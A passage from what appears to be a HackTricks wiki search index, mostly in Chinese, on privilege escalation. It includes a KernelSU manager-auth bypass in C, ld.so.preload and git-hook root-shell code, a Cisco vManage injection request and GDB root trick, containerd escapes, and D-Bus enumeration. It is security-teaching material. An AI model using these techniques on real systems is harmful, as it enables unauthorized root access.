(lowest) matching fd\\n} 强制较低编号的文件描述符指向合法的管理器APK: c #include \\n#include void preopen_legit_manager_lowfd(const char *legit_apk_path) {\\n// Reuse stdin (fd 0) if possible so the next open() returns 0\\nclose(0);\\nint fd = open(legit_apk_path, O_RDONLY);\\n(void)fd; // fd should now be 0 if available\\n} 通过 prctl hook 进行管理者身份验证: c #include \\n#include #define KSU_MAGIC 0xDEADBEEF\\n#define CMD_BECOME_MANAGER 0x100 // Placeholder; command IDs are framework-specific static inline long ksu_call(unsigned long cmd, unsigned long arg2,\\nunsigned long arg3, unsigned long arg4) {\\nreturn prctl(KSU_MAGIC, cmd, arg2, arg3, arg4);\\n} int become_manager(const char *my_data_dir) {\\nlong result = -1;\\n// arg2: command, arg3: pointer to data path (userspace->kernel copy), arg4: optional result ptr\\nresult = 
ksu_call(CMD_BECOME_MANAGER, (unsigned long)my_data_dir, 0, 0);\\nreturn (int)result;\\n} 成功后,特权命令(示例): CMD_GRANT_ROOT:将当前进程提升为root CMD_ALLOW_SU:将您的包/UID添加到持久su的白名单中 CMD_SET_SEPOLICY:根据框架的支持调整SELinux策略 竞态/持久性提示: 在AndroidManifest中注册BOOT_COMPLETED接收器(RECEIVE_BOOT_COMPLETED),以便在重启后尽早启动并在真实管理器之前尝试身份验证。","breadcrumbs":"Linux Privilege Escalation » Android Rooting Frameworks Manager Auth Bypass Syscall Hook » 利用概述(KernelSU v0.5.7)","id":"1506","title":"利用概述(KernelSU v0.5.7)"},"1507":{"body":"对于框架开发者: 将身份验证绑定到调用者的包/UID,而不是任意FD: 从UID解析调用者的包,并通过PackageManager验证与已安装包的签名,而不是扫描FD。 如果仅限于内核,使用稳定的调用者身份(任务凭证),并在init/userspace助手管理的稳定真实来源上进行验证,而不是进程FD。 避免将路径前缀检查作为身份;调用者可以轻易满足这些条件。 在通道上使用基于随机数的挑战-响应,并在启动或关键事件时清除任何缓存的管理器身份。 在可行的情况下,考虑基于binder的认证IPC,而不是重载通用系统调用。 对于防御者/蓝队: 检测root框架和管理进程的存在;如果您有内核遥测,监控带有可疑魔法常量(例如,0xDEADBEEF)的prctl调用。 在管理的设备上,阻止或警报来自不受信任包的启动接收器,这些接收器在启动后迅速尝试特权管理命令。 确保设备更新到已修补的框架版本;在更新时使缓存的管理器ID失效。 攻击的局限性: 仅影响已经使用易受攻击框架root的设备。 通常需要在合法管理器进行身份验证之前进行重启/竞态窗口(某些框架在重置之前缓存管理器UID)。","breadcrumbs":"Linux Privilege Escalation » Android Rooting Frameworks Manager Auth Bypass Syscall Hook » 检测和缓解指导","id":"1507","title":"检测和缓解指导"},"1508":{"body":"基于密码的身份验证(例如,历史APatch/SKRoot构建)如果密码可猜测/暴力破解或验证存在缺陷,可能会很弱。 基于包/签名的身份验证(例如,KernelSU)原则上更强,但必须绑定到实际调用者,而不是像FD扫描这样的间接伪影。 Magisk:CVE-2024-48336(MagiskEoP)显示,即使是成熟的生态系统也可能容易受到身份欺骗,导致在管理器上下文中执行代码。","breadcrumbs":"Linux Privilege Escalation » Android Rooting Frameworks Manager Auth Bypass Syscall Hook » 各框架相关说明","id":"1508","title":"各框架相关说明"},"1509":{"body":"Zimperium – The Rooting of All Evil: Security Holes That Could Compromise Your Mobile Device KernelSU v0.5.7 – core_hook.c path checks (L193, L201) KernelSU v0.5.7 – manager.c FD iteration/signature check (L43+) KernelSU – apk_sign.c APK v2 verification (main) KernelSU project APatch SKRoot MagiskEoP – CVE-2024-48336 KSU PoC demo video (Wistia) tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: 
HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Android Rooting Frameworks Manager Auth Bypass Syscall Hook » 参考文献","id":"1509","title":"参考文献"},"151":{"body":"Bettercap sends an mDNS request (every X ms) asking for _services._dns-sd._udp.local; the machines that see this packet usually answer this request. Then it only searches for machines answering to \\"services\\". 工具 Avahi-browser (--all) Bettercap (net.probe.mdns) Responder","breadcrumbs":"Pentesting Network » mDNS (multicast DNS)","id":"151","title":"mDNS (multicast DNS)"},"1510":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Arbitrary File Write to Root » 任意文件写入根目录","id":"1510","title":"任意文件写入根目录"},"1511":{"body":"该文件的行为类似于 LD_PRELOAD 环境变量,但它也适用于 SUID 二进制文件 。 如果您可以创建或修改它,您可以简单地添加一个 将在每个执行的二进制文件中加载的库的路径 。 例如:echo \\"/tmp/pe.so\\" > /etc/ld.so.preload c #include \\n#include \\n#include void _init() {\\nunlink(\\"/etc/ld.so.preload\\");\\nsetgid(0);\\nsetuid(0);\\nsystem(\\"/bin/bash\\");\\n}\\n//cd /tmp\\n//gcc -fPIC -shared -o pe.so pe.c -nostartfiles","breadcrumbs":"Linux Privilege Escalation » Arbitrary File Write to Root » /etc/ld.so.preload","id":"1511","title":"/etc/ld.so.preload"},"1512":{"body":"Git hooks 是 在 git 仓库中 各种事件 发生时 运行的脚本 ,例如当创建提交、合并时... 
所以如果一个 特权脚本或用户 经常执行这些操作,并且可以 在 .git 文件夹中写入 ,这可以被用来 提权 。 例如,可以在 git 仓库的 .git/hooks 中 生成一个脚本 ,这样每当创建新提交时它就会被执行: bash echo -e \'#!/bin/bash\\\\n\\\\ncp /bin/bash /tmp/0xdf\\\\nchown root:root /tmp/0xdf\\\\nchmod 4777 /tmp/b\' > pre-commit\\nchmod +x pre-commit","breadcrumbs":"Linux Privilege Escalation » Arbitrary File Write to Root » Git hooks","id":"1512","title":"Git hooks"},"1513":{"body":"TODO","breadcrumbs":"Linux Privilege Escalation » Arbitrary File Write to Root » Cron & Time files","id":"1513","title":"Cron & Time files"},"1514":{"body":"TODO","breadcrumbs":"Linux Privilege Escalation » Arbitrary File Write to Root » Service & Socket files","id":"1514","title":"Service & Socket files"},"1515":{"body":"位于 /proc/sys/fs/binfmt_misc 的文件指示哪个二进制文件应该执行哪种类型的文件。TODO: 检查滥用此功能以在打开常见文件类型时执行反向 shell 的要求。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Arbitrary File Write to Root » binfmt_misc","id":"1515","title":"binfmt_misc"},"1516":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Cisco - vmanage » Cisco - vmanage","id":"1516","title":"Cisco - vmanage"},"1517":{"body":"(来自 https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html ) 在浏览了一些与 confd 及其不同二进制文件相关的 文档 后(可以通过 Cisco 网站上的账户访问),我们发现要验证 IPC 套接字,它使用位于 /etc/confd/confd_ipc_secret 的一个秘密: vmanage:~$ ls -al /etc/confd/confd_ipc_secret -rw-r----- 1 vmanage vmanage 42 Mar 12 15:47 /etc/confd/confd_ipc_secret 记得我们的 Neo4j 实例吗?它在 vmanage 用户的权限下运行,因此允许我们利用之前的漏洞检索文件: GET /dataservice/group/devices?groupId=test\\\\\\\\\\\\\'<>\\\\\\"test\\\\\\\\\\\\\\\\\\\\\\")+RETURN+n+UNION+LOAD+CSV+FROM+\\\\\\"file:///etc/confd/confd_ipc_secret\\\\\\"+AS+n+RETURN+n+//+\' HTTP/1.1 Host: vmanage-XXXXXX.viptela.net [...] \\"data\\":[{\\"n\\":[\\"3708798204-3215954596-439621029-1529380576\\"]}]} confd_cli 程序不支持命令行参数,但会调用 /usr/bin/confd_cli_user 并传递参数。因此,我们可以直接使用我们自己的参数调用 /usr/bin/confd_cli_user。但是以我们当前的权限无法读取它,因此我们必须从 rootfs 中检索它并使用 scp 复制,阅读帮助,并使用它获取 shell: vManage:~$ echo -n \\"3708798204-3215954596-439621029-1529380576\\" > /tmp/ipc_secret vManage:~$ export CONFD_IPC_ACCESS_FILE=/tmp/ipc_secret vManage:~$ /tmp/confd_cli_user -U 0 -G 0 Welcome to Viptela CLI admin connected from 127.0.0.1 using console on vManage vManage# vshell vManage:~# id uid=0(root) gid=0(root) groups=0(root)","breadcrumbs":"Linux Privilege Escalation » Cisco - vmanage » Path 1","id":"1517","title":"Path 1"},"1518":{"body":"(Example from https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77 ) synacktiv团队的博客¹描述了一种优雅的方法来获取root shell,但缺点是需要获取/usr/bin/confd_cli_user的副本,该副本仅对root可读。我找到了一种无需如此麻烦即可提升到root的方法。 当我反汇编/usr/bin/confd_cli二进制文件时,我观察到了以下内容: vmanage:~$ objdump -d /usr/bin/confd_cli\\n… snipped …\\n40165c: 48 89 c3 mov %rax,%rbx\\n40165f: bf 1c 31 40 00 mov $0x40311c,%edi\\n401664: e8 17 f8 ff ff callq 400e80 \\n401669: 49 89 c4 mov 
%rax,%r12\\n40166c: 48 85 db test %rbx,%rbx\\n40166f: b8 dc 30 40 00 mov $0x4030dc,%eax\\n401674: 48 0f 44 d8 cmove %rax,%rbx\\n401678: 4d 85 e4 test %r12,%r12\\n40167b: b8 e6 30 40 00 mov $0x4030e6,%eax\\n401680: 4c 0f 44 e0 cmove %rax,%r12\\n401684: e8 b7 f8 ff ff callq 400f40 <-- HERE\\n401689: 89 85 50 e8 ff ff mov %eax,-0x17b0(%rbp)\\n40168f: e8 6c f9 ff ff callq 401000 <-- HERE\\n401694: 89 85 44 e8 ff ff mov %eax,-0x17bc(%rbp)\\n40169a: 8b bd 68 e8 ff ff mov -0x1798(%rbp),%edi\\n4016a0: e8 7b f9 ff ff callq 401020 \\n4016a5: c6 85 cf f7 ff ff 00 movb $0x0,-0x831(%rbp)\\n4016ac: 48 85 c0 test %rax,%rax\\n4016af: 0f 84 ad 03 00 00 je 401a62 \\n4016b5: ba ff 03 00 00 mov $0x3ff,%edx\\n4016ba: 48 89 c6 mov %rax,%rsi\\n4016bd: 48 8d bd d0 f3 ff ff lea -0xc30(%rbp),%rdi\\n4016c4: e8 d7 f7 ff ff callq 400ea0 <*ABS*+0x32e9880f0b@plt>\\n… snipped … 当我运行“ps aux”时,我观察到以下内容( note -g 100 -u 107 ) vmanage:~$ ps aux\\n… snipped …\\nroot 28644 0.0 0.0 8364 652 ? Ss 18:06 0:00 /usr/lib/confd/lib/core/confd/priv/cmdptywrapper -I 127.0.0.1 -p 4565 -i 1015 -H /home/neteng -N neteng -m 2232 -t xterm-256color -U 1358 -w 190 -h 43 -c /home/neteng -g 100 -u 1007 bash\\n… snipped … 我假设“confd_cli”程序将从登录用户收集的用户 ID 和组 ID 传递给“cmdptywrapper”应用程序。 我的第一次尝试是直接运行“cmdptywrapper”,并提供 -g 0 -u 0,但失败了。似乎在这个过程中创建了一个文件描述符 (-i 1015),我无法伪造它。 正如 synacktiv 的博客中提到的(最后一个例子),confd_cli 程序不支持命令行参数,但我可以通过调试器影响它,幸运的是系统中包含 GDB。 我创建了一个 GDB 脚本,强制 API getuid 和 getgid 返回 0。由于我已经通过反序列化 RCE 获得了“vmanage”权限,我有权限直接读取 /etc/confd/confd_ipc_secret。 root.gdb: set environment USER=root\\ndefine root\\nfinish\\nset $rax=0\\ncontinue\\nend\\nbreak getuid\\ncommands\\nroot\\nend\\nbreak getgid\\ncommands\\nroot\\nend\\nrun 控制台输出: vmanage:/tmp$ gdb -x root.gdb /usr/bin/confd_cli\\nGNU gdb (GDB) 8.0.1\\nCopyright (C) 2017 Free Software Foundation, Inc.\\nLicense GPLv3+: GNU GPL version 3 or later \\nThis is free software: you are free to change and redistribute it.\\nThere is NO WARRANTY, to the extent permitted by law. 
Type \\"show copying\\"\\nand \\"show warranty\\" for details.\\nThis GDB was configured as \\"x86_64-poky-linux\\".\\nType \\"show configuration\\" for configuration details.\\nFor bug reporting instructions, please see:\\n.\\nFind the GDB manual and other documentation resources online at:\\n.\\nFor help, type \\"help\\".\\nType \\"apropos word\\" to search for commands related to \\"word\\"...\\nReading symbols from /usr/bin/confd_cli...(no debugging symbols found)...done.\\nBreakpoint 1 at 0x400f40\\nBreakpoint 2 at 0x401000Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59\\n59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)\\n0x0000000000401689 in ?? ()Breakpoint 2, getgid () at ../sysdeps/unix/syscall-template.S:59\\n59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)\\n0x0000000000401694 in ?? ()Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59\\n59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)\\n0x0000000000401871 in ?? ()\\nWelcome to Viptela CLI\\nroot connected from 127.0.0.1 using console on vmanage\\nvmanage# vshell\\nbash-4.4# whoami ; id\\nroot\\nuid=0(root) gid=0(root) groups=0(root)\\nbash-4.4# tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Cisco - vmanage » Path 2","id":"1518","title":"Path 2"},"1519":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Containerd (ctr) Privilege Escalation » Containerd (ctr) 提权","id":"1519","title":"Containerd (ctr) 提权"},"152":{"body":"Bettercap broadcast packets to the port 137/UDP asking for the name \\"CKAAAAAAAAAAAAAAAAAAAAAAAAAAA\\".","breadcrumbs":"Pentesting Network » NBNS (NetBios Name Server)","id":"152","title":"NBNS (NetBios Name Server)"},"1520":{"body":"访问以下链接了解 什么是 containerd 和 ctr: 2375, 2376 Pentesting Docker","breadcrumbs":"Linux Privilege Escalation » Containerd (ctr) Privilege Escalation » 基本信息","id":"1520","title":"基本信息"},"1521":{"body":"如果你发现主机包含 ctr 命令: bash which ctr\\n/usr/bin/ctr 您可以列出图像: bash ctr image list\\nREF TYPE DIGEST SIZE PLATFORMS LABELS\\nregistry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 -\\nregistry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 - 然后 运行其中一个镜像,将主机根文件夹挂载到它上 : bash ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash","breadcrumbs":"Linux Privilege Escalation » Containerd (ctr) Privilege Escalation » PE 1","id":"1521","title":"PE 1"},"1522":{"body":"运行一个特权容器并从中逃逸。 您可以通过以下方式运行特权容器: bash ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash 然后您可以使用以下页面中提到的一些技术来 利用特权能力逃脱 : Docker Security tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Containerd (ctr) Privilege Escalation » PE 2","id":"1522","title":"PE 2"},"1523":{"body":"Reading time: 24 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation","id":"1523","title":"D-Bus Enumeration & Command Injection Privilege Escalation"},"1524":{"body":"D-Bus 被用作 Ubuntu 桌面环境中的进程间通信 (IPC) 中介。在 Ubuntu 中,观察到多个消息总线的并发操作:系统总线,主要用于 特权服务以暴露与系统相关的服务 ,以及每个登录用户的会话总线,仅暴露与该特定用户相关的服务。这里的重点主要是系统总线,因为它与以更高特权(例如,root)运行的服务相关,我们的目标是提升特权。值得注意的是,D-Bus 的架构为每个会话总线采用了一个“路由器”,负责根据客户端为其希望与之通信的服务指定的地址,将客户端消息重定向到适当的服务。 D-Bus 上的服务由它们暴露的 对象 和 接口 定义。对象可以类比于标准 OOP 语言中的类实例,每个实例通过 对象路径 唯一标识。该路径类似于文件系统路径,唯一标识服务暴露的每个对象。一个关键的研究接口是 org.freedesktop.DBus.Introspectable 接口,具有一个方法 Introspect。该方法返回对象支持的方法、信号和属性的 XML 表示,这里重点关注方法,同时省略属性和信号。 为了与 D-Bus 接口进行通信,使用了两个工具:一个名为 gdbus 的 CLI 工具,用于在脚本中轻松调用 D-Bus 暴露的方法,以及 D-Feet ,一个基于 Python 的 GUI 工具,旨在枚举每个总线上可用的服务并显示每个服务中包含的对象。 bash sudo apt-get install d-feet https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-21.png https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-22.png 在第一张图片中,显示了注册到 D-Bus 系统总线的服务,特别是在选择系统总线按钮后突出显示了 org.debian.apt 。D-Feet 查询此服务以获取对象,显示所选对象的接口、方法、属性和信号,如第二张图片所示。每个方法的签名也有详细说明。 一个显著的特点是显示服务的 进程 ID (pid) 和 命令行 ,这对于确认服务是否以提升的权限运行非常有用,这对研究的相关性很重要。 D-Feet 还允许方法调用 :用户可以输入 Python 表达式作为参数,D-Feet 会将其转换为 D-Bus 类型,然后传递给服务。 但是,请注意 某些方法需要身份验证 ,才能允许我们调用它们。我们将忽略这些方法,因为我们的目标是首先在没有凭据的情况下提升我们的权限。 还要注意,某些服务会查询另一个名为 org.freedesktop.PolicyKit1 的 D-Bus 
服务,以确定用户是否应该被允许执行某些操作。","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » GUI enumeration","id":"1524","title":"GUI enumeration"},"1525":{"body":"","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » 命令行枚举","id":"1525","title":"命令行枚举"},"1526":{"body":"可以使用以下命令列出打开的 D-Bus 接口: bash busctl list #List D-Bus interfaces NAME PID PROCESS USER CONNECTION UNIT SE\\n:1.0 1 systemd root :1.0 init.scope -\\n:1.1345 12817 busctl qtc :1.1345 session-729.scope 72\\n:1.2 1576 systemd-timesyn systemd-timesync :1.2 systemd-timesyncd.service -\\n:1.3 2609 dbus-server root :1.3 dbus-server.service -\\n:1.4 2606 wpa_supplicant root :1.4 wpa_supplicant.service -\\n:1.6 2612 systemd-logind root :1.6 systemd-logind.service -\\n:1.8 3087 unattended-upgr root :1.8 unattended-upgrades.serv… -\\n:1.820 6583 systemd qtc :1.820 user@1000.service -\\ncom.ubuntu.SoftwareProperties - - - (activatable) - -\\nfi.epitest.hostap.WPASupplicant 2606 wpa_supplicant root :1.4 wpa_supplicant.service -\\nfi.w1.wpa_supplicant1 2606 wpa_supplicant root :1.4 wpa_supplicant.service -\\nhtb.oouch.Block 2609 dbus-server root :1.3 dbus-server.service -\\norg.bluez - - - (activatable) - -\\norg.freedesktop.DBus 1 systemd root - init.scope -\\norg.freedesktop.PackageKit - - - (activatable) - -\\norg.freedesktop.PolicyKit1 - - - (activatable) - -\\norg.freedesktop.hostname1 - - - (activatable) - -\\norg.freedesktop.locale1 - - - (activatable) - - 连接 来自维基百科: 当一个进程建立与总线的连接时,总线会为该连接分配一个称为 唯一连接名称 的特殊总线名称。这种类型的总线名称是不可变的——只要连接存在,就保证它们不会改变——更重要的是,它们在总线的生命周期内不能被重用。这意味着,即使同一个进程关闭与总线的连接并创建一个新的连接,也不会有其他连接被分配这样的唯一连接名称。唯一连接名称很容易识别,因为它们以——否则被禁止的——冒号字符开头。","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » 列出服务对象","id":"1526","title":"列出服务对象"},"1527":{"body":"然后,您可以通过以下方式获取有关接口的一些信息: bash busctl status htb.oouch.Block #Get info of \\"htb.oouch.Block\\" interface 
PID=2609\\nPPID=1\\nTTY=n/a\\nUID=0\\nEUID=0\\nSUID=0\\nFSUID=0\\nGID=0\\nEGID=0\\nSGID=0\\nFSGID=0\\nSupplementaryGIDs=\\nComm=dbus-server\\nCommandLine=/root/dbus-server\\nLabel=unconfined\\nCGroup=/system.slice/dbus-server.service\\nUnit=dbus-server.service\\nSlice=system.slice\\nUserUnit=n/a\\nUserSlice=n/a\\nSession=n/a\\nAuditLoginUID=n/a\\nAuditSessionID=n/a\\nUniqueName=:1.3\\nEffectiveCapabilities=cap_chown cap_dac_override cap_dac_read_search\\ncap_fowner cap_fsetid cap_kill cap_setgid\\ncap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service\\ncap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock\\ncap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot\\ncap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot\\ncap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config\\ncap_mknod cap_lease cap_audit_write cap_audit_control\\ncap_setfcap cap_mac_override cap_mac_admin cap_syslog\\ncap_wake_alarm cap_block_suspend cap_audit_read\\nPermittedCapabilities=cap_chown cap_dac_override cap_dac_read_search\\ncap_fowner cap_fsetid cap_kill cap_setgid\\ncap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service\\ncap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock\\ncap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot\\ncap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot\\ncap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config\\ncap_mknod cap_lease cap_audit_write cap_audit_control\\ncap_setfcap cap_mac_override cap_mac_admin cap_syslog\\ncap_wake_alarm cap_block_suspend cap_audit_read\\nInheritableCapabilities=\\nBoundingCapabilities=cap_chown cap_dac_override cap_dac_read_search\\ncap_fowner cap_fsetid cap_kill cap_setgid\\ncap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service\\ncap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock\\ncap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot\\ncap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot\\ncap_sys_nice cap_sys_resource cap_sys_time 
cap_sys_tty_config\\ncap_mknod cap_lease cap_audit_write cap_audit_control\\ncap_setfcap cap_mac_override cap_mac_admin cap_syslog\\ncap_wake_alarm cap_block_suspend cap_audit_read","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » 服务对象信息","id":"1527","title":"服务对象信息"},"1528":{"body":"您需要拥有足够的权限。 bash busctl tree htb.oouch.Block #Get Interfaces of the service object └─/htb\\n└─/htb/oouch\\n└─/htb/oouch/Block","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » 列出服务对象的接口","id":"1528","title":"列出服务对象的接口"},"1529":{"body":"注意在这个例子中,选择了使用 tree 参数发现的最新接口( 见前一部分 ): bash busctl introspect htb.oouch.Block /htb/oouch/Block #Get methods of the interface NAME TYPE SIGNATURE RESULT/VALUE FLAGS\\nhtb.oouch.Block interface - - -\\n.Block method s s -\\norg.freedesktop.DBus.Introspectable interface - - -\\n.Introspect method - s -\\norg.freedesktop.DBus.Peer interface - - -\\n.GetMachineId method - s -\\n.Ping method - - -\\norg.freedesktop.DBus.Properties interface - - -\\n.Get method ss v -\\n.GetAll method s a{sv} -\\n.Set method ssv - -\\n.PropertiesChanged signal sa{sv}as - - 注意接口 htb.oouch.Block 的方法 .Block(我们感兴趣的那个)。其他列的 \\"s\\" 可能意味着它期望一个字符串。","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » Introspect Interface of a Service Object","id":"1529","title":"Introspect Interface of a Service Object"},"153":{"body":"Bettercap broadcast SSDP packets searching for all kind of services (UDP Port 1900).","breadcrumbs":"Pentesting Network » SSDP (Simple Service Discovery Protocol)","id":"153","title":"SSDP (Simple Service Discovery Protocol)"},"1530":{"body":"拥有足够的权限(仅有 send_destination 和 receive_sender 权限是不够的)你可以 监控 D-Bus 通信 。 为了 监控 一次 通信 你需要是 root 。如果你在成为 root 时仍然遇到问题,请查看 https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/ 和 https://wiki.ubuntu.com/DebuggingDBus warning 如果你知道如何配置 D-Bus 配置文件以 允许非 root 用户嗅探 
通信,请 联系我 ! 监控的不同方法: bash sudo busctl monitor htb.oouch.Block #Monitor only specified\\nsudo busctl monitor #System level, even if this works you will only see messages you have permissions to see\\nsudo dbus-monitor --system #System level, even if this works you will only see messages you have permissions to see 在以下示例中,接口 htb.oouch.Block 被监控,并且 消息 \\" lalalalal \\" 通过误传发送 : bash busctl monitor htb.oouch.Block Monitoring bus message stream.\\n‣ Type=method_call Endian=l Flags=0 Version=1 Priority=0 Cookie=2\\nSender=:1.1376 Destination=htb.oouch.Block Path=/htb/oouch/Block Interface=htb.oouch.Block Member=Block\\nUniqueName=:1.1376\\nMESSAGE \\"s\\" {\\nSTRING \\"lalalalal\\";\\n}; ‣ Type=method_return Endian=l Flags=1 Version=1 Priority=0 Cookie=16 ReplyCookie=2\\nSender=:1.3 Destination=:1.1376\\nUniqueName=:1.3\\nMESSAGE \\"s\\" {\\nSTRING \\"Carried out :D\\";\\n}; 您可以使用 capture 代替 monitor 将结果保存到 pcap 文件中。 过滤所有噪音 如果总线上的信息太多,请传递一个匹配规则,如下所示: bash dbus-monitor \\"type=signal,sender=\'org.gnome.TypingMonitor\',interface=\'org.gnome.TypingMonitor\'\\" 可以指定多个规则。如果消息匹配_任何_规则,消息将被打印。像这样: bash dbus-monitor \\"type=error\\" \\"sender=org.freedesktop.SystemToolsBackends\\" bash dbus-monitor \\"type=method_call\\" \\"type=method_return\\" \\"type=error\\" 查看 D-Bus文档 以获取有关匹配规则语法的更多信息。","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » 监控/捕获接口","id":"1530","title":"监控/捕获接口"},"1531":{"body":"busctl 还有更多选项, 在这里找到所有选项 。","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » 更多","id":"1531","title":"更多"},"1532":{"body":"作为用户 qtc 在 HTB 的主机 \\"oouch\\" 内 ,您可以找到一个位于 /etc/dbus-1/system.d/htb.oouch.Block.conf 的 意外 D-Bus 配置文件 : xml \\n\\n \\n\\n\\n 注意从之前的配置中, 您需要是用户 root 或 www-data 才能通过此 D-BUS 通信发送和接收信息 。 